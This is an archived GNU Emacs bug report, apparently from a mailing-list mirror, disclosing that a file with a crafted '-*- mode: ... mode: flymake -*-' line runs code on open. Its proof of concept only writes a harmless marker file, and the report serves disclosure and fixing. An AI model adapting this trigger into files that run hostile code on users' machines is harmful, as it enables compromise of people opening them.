unofficial mirror of bug-gnu-emacs@gnu.org 
 help / color / mirror / code / Atom feed
From: adam plaice <plaice.adam+lists@gmail.com>
To: 37656@debbugs.gnu.org
Subject: bug#37656: 27.0.50; Opening file with specially crafted local variables can cause arbitrary code execution Inbox x
Date: Tue, 8 Oct 2019 10:48:32 +0200	[thread overview]
Message-ID: <CAJw81da4=R1jMJ0enx6SbO7G1rzaL61K2kqbY+jxhe=AM-3vtQ@mail.gmail.com> (raw)

* To reproduce:

1. Create a file, say `~/foobar', (it could have an arbitrary
extension) with the following contents:

-*- mode: emacs-lisp; mode: flymake -*-

(eval-when-compile
  (with-temp-file "~/emacs_flymake_security_bug"
      (insert "Could have also executed any code.")))

2. Open the file with emacs:

emacs -Q ~/foobar

3. Inspect ~/emacs_flymake_security_bug:

cat ~/emacs_flymake_security_bug

* Expected result

~/emacs_flymake_security_bug does not exist.

* Actual result

~/emacs_flymake_security_bug does exist.

* Further information

This relies on the "deprecated" feature of allowing `mode: ' to be
repeated more than once, to also specify minor modes.  Just having:

-*- mode: flymake -*-

in, say, `~/foobar.el' would not trigger the security bug.  There may,
however, be alternative ways of triggering it, that I haven't come up
with.


This was "inspired" by a very similar bug (concerning an external
package, editorconfig), described here:

https://illikainen.dev/blog/2019-10-06-editorconfig

Thank you and best regards,
Adam


In GNU Emacs 27.0.50 (build 1, x86_64-pc-linux-gnu, GTK+ Version 3.18.9)
 of 2019-10-07 built on adam
Repository revision: 9839466b231b6384055b9b137405730876413cbe
Repository branch: master
Windowing system distributor 'The X.Org Foundation', version 11.0.11804000
System Description: Ubuntu 16.04.6 LTS

Recent messages:
For information about GNU Emacs and the GNU system, type C-h C-a.

Configured using:
 'configure --with-modules --without-pop'

Configured features:
XPM JPEG TIFF GIF PNG RSVG SOUND GPM DBUS GSETTINGS GLIB NOTIFY INOTIFY
ACL LIBSELINUX GNUTLS LIBXML2 FREETYPE HARFBUZZ M17N_FLT LIBOTF XFT ZLIB
TOOLKIT_SCROLL_BARS GTK3 X11 XDBE XIM MODULES THREADS PDUMPER LCMS2 GMP

Important settings:
  value of $LANG: en_GB.UTF-8
  locale-coding-system: utf-8-unix

Major mode: Lisp Interaction

Minor modes in effect:
  tooltip-mode: t
  global-eldoc-mode: t
  eldoc-mode: t
  electric-indent-mode: t
  mouse-wheel-mode: t
  tool-bar-mode: t
  menu-bar-mode: t
  file-name-shadow-mode: t
  global-font-lock-mode: t
  font-lock-mode: t
  blink-cursor-mode: t
  auto-composition-mode: t
  auto-encryption-mode: t
  auto-compression-mode: t
  line-number-mode: t
  transient-mark-mode: t

Load-path shadows:
None found.

Features:
(shadow sort mail-extr emacsbug message rmc puny dired dired-loaddefs
format-spec rfc822 mml easymenu mml-sec password-cache epa derived epg
epg-config gnus-util rmail rmail-loaddefs text-property-search time-date
subr-x seq byte-opt gv bytecomp byte-compile cconv mm-decode mm-bodies
mm-encode mail-parse rfc2231 mailabbrev gmm-utils mailheader cl-loaddefs
cl-lib sendmail rfc2047 rfc2045 ietf-drums mm-util mail-prsvr mail-utils
tooltip eldoc electric uniquify ediff-hook vc-hooks lisp-float-type
mwheel term/x-win x-win term/common-win x-dnd tool-bar dnd fontset image
regexp-opt fringe tabulated-list replace newcomment text-mode elisp-mode
lisp-mode prog-mode register page tab-bar menu-bar rfn-eshadow isearch
timer select scroll-bar mouse jit-lock font-lock syntax facemenu
font-core term/tty-colors frame cl-generic cham georgian utf-8-lang
misc-lang vietnamese tibetan thai tai-viet lao korean japanese eucjp-ms
cp51932 hebrew greek romanian slovak czech european ethiopic indian
cyrillic chinese composite charscript charprop case-table epa-hook
jka-cmpr-hook help simple abbrev obarray minibuffer cl-preloaded nadvice
loaddefs button faces cus-face macroexp files text-properties overlay
sha1 md5 base64 format env code-pages mule custom widget
hashtable-print-readable backquote threads dbusbind inotify lcms2
dynamic-setting system-font-setting font-render-setting move-toolbar gtk
x-toolkit x multi-tty make-network-process emacs)

Memory information:
((conses 16 44045 5448)
 (symbols 48 5971 1)
 (strings 32 15685 1582)
 (string-bytes 1 506409)
 (vectors 16 9198)
 (vector-slots 8 123144 8510)
 (floats 8 19 25)
 (intervals 56 186 0)
 (buffers 1000 11)
 (heap 1024 12431 1138))





             reply	other threads:[~2019-10-08  8:48 UTC|newest]

Thread overview: 3+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2019-10-08  8:48 adam plaice [this message]
2019-10-15 21:05 ` bug#37656: 27.0.50; Arbitrary code execution with special `mode:' adam plaice
2019-10-16 13:13 ` bug#37656: 27.0.50; Opening file with specially crafted local variables can cause arbitrary code execution Inbox x Stefan Monnier

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

  List information: https://www.gnu.org/software/emacs/

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to='CAJw81da4=R1jMJ0enx6SbO7G1rzaL61K2kqbY+jxhe=AM-3vtQ@mail.gmail.com' \
    --to=plaice.adam+lists@gmail.com \
    --cc=37656@debbugs.gnu.org \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line before the message body.
Code repositories for project(s) associated with this public inbox

	https://git.savannah.gnu.org/cgit/emacs.git

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for read-only IMAP folder(s) and NNTP newsgroup(s).